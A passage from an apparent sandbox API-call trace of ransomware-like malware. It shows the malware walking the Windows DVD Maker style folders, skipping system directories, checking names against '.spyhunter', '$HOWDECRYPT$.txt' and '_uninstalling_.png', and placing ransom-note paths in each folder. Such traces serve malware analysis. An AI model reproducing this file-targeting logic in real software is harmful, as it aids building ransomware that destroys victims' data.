1 [0093.292] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.292] lstrcmpiW (lpString1="TravelIntroToMainMask.wmv", lpString2="System Volume Information") returned 1 [0093.292] lstrlenW (lpString="System Volume Information") returned 25 [0093.293] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv") returned 80 [0093.293] StrStrIW (lpFirst="TravelIntroToMainMask.wmv", lpSrch=".spyhunter") returned 0x0 [0093.293] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.293] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="_uninstalling_.png") returned 1 [0093.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv") returned 80 [0093.293] GetProcessHeap () returned 0x2c0000 [0093.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f148 [0093.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0093.293] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.293] lstrcmpiW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="Windows") returned -1 [0093.293] lstrlenW (lpString="Windows") returned 7 [0093.293] lstrcmpiW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.293] lstrcmpiW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="System Volume Information") returned 1 [0093.293] lstrlenW (lpString="System Volume Information") returned 25 [0093.293] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 84 [0093.293] StrStrIW (lpFirst="TravelIntroToMainMask_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.293] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.293] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 84 [0093.293] GetProcessHeap () returned 0x2c0000 [0093.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3553b0 [0093.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0093.293] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.293] lstrcmpiW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="Windows") returned -1 [0093.293] lstrlenW (lpString="Windows") returned 7 [0093.293] lstrcmpiW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.294] lstrcmpiW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="System Volume Information") returned 1 [0093.294] lstrlenW (lpString="System Volume Information") returned 25 [0093.294] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv") returned 80 [0093.294] StrStrIW (lpFirst="TravelIntroToMain_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.294] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.294] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv") returned 80 [0093.294] GetProcessHeap () returned 0x2c0000 [0093.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f058 [0093.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0093.294] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.294] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.295] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\$HOWDECRYPT$.txt") returned 71 [0093.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\$HOWDECRYPT$.txt") returned 71 [0093.295] GetProcessHeap () returned 0x2c0000 [0093.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e200 [0093.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0093.295] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.295] lstrcmpiW (lpString1="VideoWall", lpString2="Windows") returned -1 [0093.295] lstrlenW (lpString="Windows") returned 7 [0093.295] lstrcmpiW (lpString1="VideoWall", lpString2="$Recycle.bin") returned 1 [0093.295] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.296] lstrcmpiW (lpString1="VideoWall", lpString2="System Volume Information") returned 1 [0093.296] lstrlenW (lpString="System Volume Information") returned 25 [0093.296] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 57 [0093.296] lstrcmpW (lpString1="VideoWall", lpString2=".") returned 1 [0093.296] lstrcmpW (lpString1="VideoWall", lpString2="..") returned 1 [0093.296] GetProcessHeap () returned 0x2c0000 [0093.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.296] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*") returned 59 [0093.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.296] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.296] lstrlenW (lpString="Windows") returned 7 [0093.296] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.296] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.296] lstrlenW (lpString="System Volume Information") returned 25 [0093.296] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\.") returned 59 [0093.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.297] lstrlenW (lpString="Windows") returned 7 [0093.297] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.297] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.297] lstrlenW (lpString="System Volume Information") returned 25 [0093.297] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\..") returned 60 [0093.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.297] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0093.297] lstrlenW (lpString="Windows") returned 7 [0093.297] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="$Recycle.bin") returned 1 [0093.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.297] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="System Volume Information") returned -1 [0093.297] lstrlenW (lpString="System Volume Information") returned 25 [0093.297] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png") returned 77 [0093.297] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.297] lstrcmpW (lpString1="203x8subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.297] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png") returned 77 [0093.297] GetProcessHeap () returned 0x2c0000 [0093.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x378478 [0093.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0093.298] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.298] lstrcmpiW (lpString1="videowall.png", lpString2="Windows") returned -1 [0093.298] lstrlenW (lpString="Windows") returned 7 [0093.298] lstrcmpiW (lpString1="videowall.png", lpString2="$Recycle.bin") returned 1 [0093.298] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.298] lstrcmpiW (lpString1="videowall.png", lpString2="System Volume Information") returned 1 [0093.298] lstrlenW (lpString="System Volume Information") returned 25 [0093.298] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png") returned 71 [0093.298] StrStrIW (lpFirst="videowall.png", lpSrch=".spyhunter") returned 0x0 [0093.298] lstrcmpW (lpString1="videowall.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.298] lstrcmpW (lpString1="videowall.png", lpString2="_uninstalling_.png") returned 1 [0093.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png") returned 71 [0093.298] GetProcessHeap () returned 0x2c0000 [0093.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e638 [0093.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0093.298] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.298] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.299] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\$HOWDECRYPT$.txt") returned 74 [0093.299] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\$HOWDECRYPT$.txt") returned 74 [0093.299] GetProcessHeap () returned 0x2c0000 [0093.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346e28 [0093.299] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0093.299] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.299] lstrcmpiW (lpString1="Vignette", lpString2="Windows") returned -1 [0093.299] lstrlenW (lpString="Windows") returned 7 [0093.299] lstrcmpiW (lpString1="Vignette", lpString2="$Recycle.bin") returned 1 [0093.299] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.299] lstrcmpiW (lpString1="Vignette", lpString2="System Volume Information") returned 1 [0093.299] lstrlenW (lpString="System Volume Information") returned 25 [0093.299] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 56 [0093.299] lstrcmpW (lpString1="Vignette", lpString2=".") returned 1 [0093.299] lstrcmpW (lpString1="Vignette", lpString2="..") returned 1 [0093.299] GetProcessHeap () returned 0x2c0000 [0093.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.299] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*") returned 58 [0093.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0095.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.260] lstrlenW (lpString="Windows") returned 7 [0095.260] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.261] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.261] lstrlenW (lpString="System Volume Information") returned 25 [0095.261] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\.") returned 58 [0095.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.261] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.261] lstrlenW (lpString="Windows") returned 7 [0095.261] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.261] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.261] lstrlenW (lpString="System Volume Information") returned 25 [0095.261] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\..") returned 59 [0095.261] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.261] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.261] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0095.261] lstrlenW (lpString="Windows") returned 7 [0095.261] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0095.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.261] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0095.261] lstrlenW (lpString="System Volume Information") returned 25 [0095.261] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png") returned 74 [0095.261] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0095.261] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.262] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0095.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png") returned 74 [0095.262] GetProcessHeap () returned 0x2c0000 [0095.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x3468e8 [0095.262] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1440) returned 0x2c310e0 [0095.262] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.262] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0095.262] lstrlenW (lpString="Windows") returned 7 [0095.262] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0095.262] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.262] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0095.262] lstrlenW (lpString="System Volume Information") returned 25 [0095.262] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png") returned 69 [0095.262] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0095.262] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.262] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0095.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png") returned 69 [0095.262] GetProcessHeap () returned 0x2c0000 [0095.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0095.262] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1448) returned 0x2c310e0 [0095.262] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.262] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0095.262] lstrlenW (lpString="Windows") returned 7 [0095.262] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0095.263] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.263] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0095.263] lstrlenW (lpString="System Volume Information") returned 25 [0095.263] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png") returned 89 [0095.263] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0095.263] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.263] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0095.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png") returned 89 [0095.263] GetProcessHeap () returned 0x2c0000 [0095.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a160 [0095.263] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1450) returned 0x2c310e0 [0095.263] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.263] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0095.263] lstrlenW (lpString="Windows") returned 7 [0095.263] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0095.263] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.263] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0095.263] lstrlenW (lpString="System Volume Information") returned 25 [0095.263] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png") returned 95 [0095.263] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0095.263] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.263] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0095.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png") returned 95 [0095.263] GetProcessHeap () returned 0x2c0000 [0095.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381880 [0095.264] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1458) returned 0x2c310e0 [0095.264] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.264] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0095.264] lstrlenW (lpString="Windows") returned 7 [0095.264] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0095.264] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.264] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0095.264] lstrlenW (lpString="System Volume Information") returned 25 [0095.264] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png") returned 90 [0095.264] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0095.264] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.264] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0095.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png") returned 90 [0095.265] GetProcessHeap () returned 0x2c0000 [0095.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a260 [0095.265] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1460) returned 0x2c310e0 [0095.266] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.266] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0095.266] lstrlenW (lpString="Windows") returned 7 [0095.266] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0095.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.266] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0095.266] lstrlenW (lpString="System Volume Information") returned 25 [0095.266] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png") returned 96 [0095.266] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0095.266] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.266] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0095.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png") returned 96 [0095.266] GetProcessHeap () returned 0x2c0000 [0095.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37a750 [0095.266] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1468) returned 0x2c310e0 [0095.266] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.266] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0095.266] lstrlenW (lpString="Windows") returned 7 [0095.266] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0095.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.267] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0095.267] lstrlenW (lpString="System Volume Information") returned 25 [0095.267] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png") returned 87 [0095.267] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0095.267] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.267] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0095.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png") returned 87 [0095.267] GetProcessHeap () returned 0x2c0000 [0095.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x3555a0 [0095.267] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1470) returned 0x2c310e0 [0095.267] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.267] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0095.267] lstrlenW (lpString="Windows") returned 7 [0095.267] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0095.267] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.267] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0095.267] lstrlenW (lpString="System Volume Information") returned 25 [0095.267] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png") returned 93 [0095.267] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0095.267] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.267] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0095.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png") returned 93 [0095.267] GetProcessHeap () returned 0x2c0000 [0095.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381988 [0095.267] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1478) returned 0x2c310e0 [0095.268] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0095.268] lstrcmpiW (lpString1="softedges.png", lpString2="Windows") returned -1 [0095.268] lstrlenW (lpString="Windows") returned 7 [0095.268] lstrcmpiW (lpString1="softedges.png", lpString2="$Recycle.bin") returned 1 [0095.268] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.268] lstrcmpiW (lpString1="softedges.png", lpString2="System Volume Information") returned -1 [0095.268] lstrlenW (lpString="System Volume Information") returned 25 [0095.268] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 